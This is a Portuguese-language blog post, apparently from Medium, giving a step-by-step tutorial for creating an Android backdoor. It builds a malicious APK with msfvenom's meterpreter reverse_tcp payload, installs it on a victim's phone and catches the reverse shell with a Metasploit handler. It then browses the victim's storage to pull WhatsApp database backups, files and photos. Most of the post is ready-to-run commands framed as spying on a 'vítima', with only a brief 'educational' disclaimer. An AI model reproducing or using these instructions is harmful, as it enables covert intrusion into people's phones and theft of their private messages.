Você está na página 1de 6

Otimizada agora mesmo Ver original

https://medium.com/@leonardomarciano/criando-backdoors-para-android-utilizando-metaexploit-e-obtendo-acesso-a-mensagens-de-wh

Menu

Criando Backdoors para Android


utilizando Metaexploit e obtendo
acesso a mensagens de WhatsApp!
Leonardo Marciano
Mar 3, 2018 · 2 min read

Já se imaginou obtendo acesso a arquivos e até conversas do


whatsapp de usuários Android? neste post iremos utilizar o Meta
Exploit framework para criar um backdoor capaz de coletar
informações e arquivos do dispositivo vitima.

Recomendo a todos seguirem este post utilizando Kali Linux,


máááásss não é obrigatório!

Vamos precisar ‘apenas’ do metaexploit! clique aqui para fazer


aprender a instalar e configurar o metaexploit

Vamos lá!
Iniciaremos criando nosso payload, com o terminal aberto, inicie o
msfvenom e crie um .apk, isso realmente é muito simples de se
fazer!

msfvenom -p android/meterpreter/reverse_tcp LHOST=(SEU IP OU


DDNS) LPORT=(Porta que deseja utilizar) R >/root/FILENAME.apk

Onde definimos que nosso target é o android e criamos um server


listen, no comando acima você deve modificar os parâmetros LHOST
e LPORT para as de sua máquina, para exemplos iremos utilizar o ip
172.217.30.78(google) e a porta 3333.
Também é de extrema importância alterar o parâmetro R> que é o
local de despejo de nosso payload

No nosso caso, ficou assim:


msfvenom -p android/meterpreter/reverse_tcp LHOST=172.217.30.78
LPORT=3333 R >/root/marciano/payload.apk

Com o apk em mãos, instale no smartphone vitima!

Iniciando um handler
Agora que temos nosso payload instalado no dispositivo vítima,
vamos iniciar um hander para receber e enviar informações ao
smartphone!

No terminal, siga as instruções abaixo:

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 172.217.30.78
set LPORT 3333
exploit

onde:

msfconsole: inicia uma instancia do console MetaExploit.


use exploit/multi/handler​ : inicia uma instancia do handler global
do MetaExploit.
set LHOST: define onde sera nosso handler, aqui você deve colocar o
IP, DDNS de sua maquina.
set LPORT: define a porta de nosso handler
exploit: inicia nossa instancia.

Neste ponto você já vai ter acesso aos arquivos do usuário! já pode
explorar os arquivos, obter conversas do whatsapp e fotos.
basta digitar shell e brincar :)

Avançaaaandooooo! que tal interagir com o smartphone da vítima e


acesssar as mensagens de seu whatsapp? isso é bem simples após ter
o payload conectado!
zapzap, saposao, zap, wetsapo, whatsapo ou saposapo?

Pra isso, vamos com o Payload conectado, apenas inicie o terminal


remoto com o dispositivo (digitando shell) e navegue até o diretório
db do whatsapp, o android é base linux! Isso significa que você
provavelmente deve ter bastante familiaridade com comandos de
navegação.

Vamos lá!
marciano@MARCIANO-NOTE8 ~> shell
marciano@MARCIANO-NOTE8 ~> cd ..
marciano@MARCIANO-NOTE8 ~> cd sdcard/
marciano@MARCIANO-NOTE8 ~> cd whatsapp
marciano@MARCIANO-NOTE8 ~> ls
marciano@MARCIANO-NOTE8 ~> cd backups
marciano@MARCIANO-NOTE8 ~> cd dbs

O arquivo tem o seguinte formato: databackup.db.crypt12 onde


databackup é data do backup.

Agora você só precisa de um WhatsApp Viewer

Portas abertas para varias possibilidades, esse post foi criado com
intuito educacional!

Creditos: me

WhatsApp Hacking Linux Security

66 claps

WRITTEN BY

Leonardo Marciano

Nós sempre nos definimos pela capacidade de superar o impossível.


Steemit: @lstark

Follow

See responses (6)

More From Medium

Related reads

What are the typical words in exception


messages?
Andras Horvath in samebug 270
Jul 27, 2018 · 4 min read

Related reads
Lewagon — Learning how to code in Rio de
Janeiro
Stuart Boyle 476
Oct 4, 2018 · 6 min read

Related reads

Using WayBack Machine Downloader


Alex Santos 53
Mar 27 · 5 min read
About Help Legal

Become a member Sign in

Você também pode gostar